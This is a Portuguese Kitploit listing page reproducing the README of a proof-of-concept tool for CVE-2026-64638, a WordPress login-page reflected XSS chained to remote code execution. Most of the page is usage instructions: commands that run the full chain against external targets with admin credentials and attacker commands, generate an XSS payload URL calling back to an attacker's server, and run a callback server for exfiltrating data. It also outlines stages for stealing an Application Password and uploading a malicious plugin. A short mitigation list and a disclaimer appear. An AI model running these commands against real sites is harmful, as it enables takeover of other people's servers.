Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-64638-POC — CVE-2026-64638: PoC de XSS pré-autenticação no WordPress → RCE (XSS2Shell) | Kitploit
Ferramentas/GitHubGitHub/imbas007/cve-2026-64638-poc
Scanners de Vulnerabilidades WebGeração de PayloadsExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubimbas007/cve-2026-64638-poc

CVE-2026-64638-POC

CVE-2026-64638: PoC de XSS pré-autenticação no WordPress → RCE (XSS2Shell)

Ver Repositório
9210há 1 mêsAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-64638 — XSS2Shell

XSS Refletido Pré-Autenticação → Execução Remota de Código no WordPress Core

License WordPress CVE

⚠️ AVISO: Este repositório destina-se exclusivamente a pesquisa de segurança autorizada e fins educacionais. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar. O acesso não autorizado é ilegal. Consulte SECURITY.md.


Visão Geral

CVE-2026-64638 é um XSS refletido pré-autenticação no pipeline de processamento de login/wplogin do WordPress Core. A falha decorre de um diferencial de parser em que uma entrada malformada sobrevive ao strip_tags() do PHP, mas posteriormente é reconstruída como HTML por wp_kses_post(), permitindo que marcação controlada pelo atacante chegue ao DOM.

Pesquisadores da pwn.ai demonstraram o XSS2Shell — uma cadeia que eleva esse XSS à execução completa de código PHP em uma instalação padrão do WordPress quando um administrador autenticado interage com conteúdo controlado pelo atacante.

PropriedadeValor
CVECVE-2026-64638
CVSS8.9
TipoCadeia de XSS refletido → RCE
ComponentePágina de login do WordPress Core
AfetadosWordPress < 7.0.3 (backports até 4.7)
Corrigido emWordPress 7.0.3 (6 de agosto de 2026)
Causa raizDiferencial de parser: strip_tags() vs wp_kses_post()

Início Rápido (Docker)

root@kitploit:~
git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC

# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain

O que acontece:

root@kitploit:~
[STAGE 1] WordPress 7.0.2 → VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE → uid=33(www-data)

Todos os Comandos

root@kitploit:~
./test.sh up         # Start Docker + install WordPress (admin/admin123)
./test.sh scan       # Detect version & patch status
./test.sh chain      # Run full XSS2Shell RCE chain
./test.sh all        # up + scan + chain (all-in-one)
./test.sh down       # Stop containers
./test.sh clean      # Stop + remove all volumes

# Or with Make
make up              # Start Docker
make install         # Install WordPress
make scan            # Check vulnerability
make gen-xss         # Generate XSS payload URL
make test-chain      # Full RCE chain
make serve           # Start callback server on :8080
make down            # Stop containers

Estrutura do Repositório

root@kitploit:~
CVE-2026-64638-POC/
├── README.md
├── SECURITY.md              # Security policy & disclaimer
├── docker-compose.yml        # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile                  # Shortcut commands
├── test.sh                   # Automated test suite
├── requirements.txt          # Python dependencies
│
├── xss2shell_chain.py       # [MAIN] Full chain: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py     # Version detection + username reflection test
├── xss2shell_checker.py     # Lightweight patch checker (safe, non-exploitative)
├── exploit_server.py        # Callback server for XSS exfiltration
├── xss_payload.html         # Interactive XSS PoC (browser)
│
└── docs/
    ├── CHAIN.md             # Technical breakdown of all 7 chain stages
    ├── MITIGATION.md        # Defensive guidance + detection rules
    └── PAYLOAD_NOTES.md     # Notes on the CVE-specific bypass payload

Uso Manual (Alvo Externo)

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt

# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com

# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080

# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
    -u https://target.example.com \
    --user admin --pass "password" \
    --cmd "id"

# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"

A Cadeia de Ataque XSS2Shell

Consulte docs/CHAIN.md para obter detalhes completos.

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Reflected XSS on wp-login.php (failed-login error page)    │
│  2. DOM clobbering to manipulate page context                   │
│  3. JSONP / Same-Origin Method Execution (SOME)                 │
│  4. Application Password creation via REST API                  │
│  5. REST API access with stolen Application Password            │
│  6. Malicious plugin/theme upload                               │
│  7. PHP code execution → full RCE                               │
└─────────────────────────────────────────────────────────────────┘

Nota: As etapas 3 a 7 exigem que um administrador autenticado interaja com o payload de XSS. A vulnerabilidade é pré-autenticação, mas a cadeia completa de RCE requer acesso de nível administrador para ser concluída.


Mitigação

  1. Atualize o WordPress para 7.0.3 ou posterior imediatamente
  2. Ative as atualizações automáticas em segundo plano
  3. Audite as Senhas de Aplicativo (Usuários → Perfil)
  4. Revise os logs em busca de nomes de usuário suspeitos em falhas de login
  5. Monitore a atividade de upload de plugins/temas

Consulte docs/MITIGATION.md para regras detalhadas de endurecimento e detecção.


Referências

  • Comunicado de Segurança do WordPress 7.0.3
  • Blog XSS2Shell da pwn.ai
  • Write-up sobre SOME/Bypass de CSP da pwn.ai
  • Cobertura do The Hacker News
  • Artigo do The CyberSec Guru
  • Registro CVE

Autor

Pesquisa de segurança e PoC. Para uso educacional.

Licença

MIT — Consulte LICENSE

Baixar ferramenta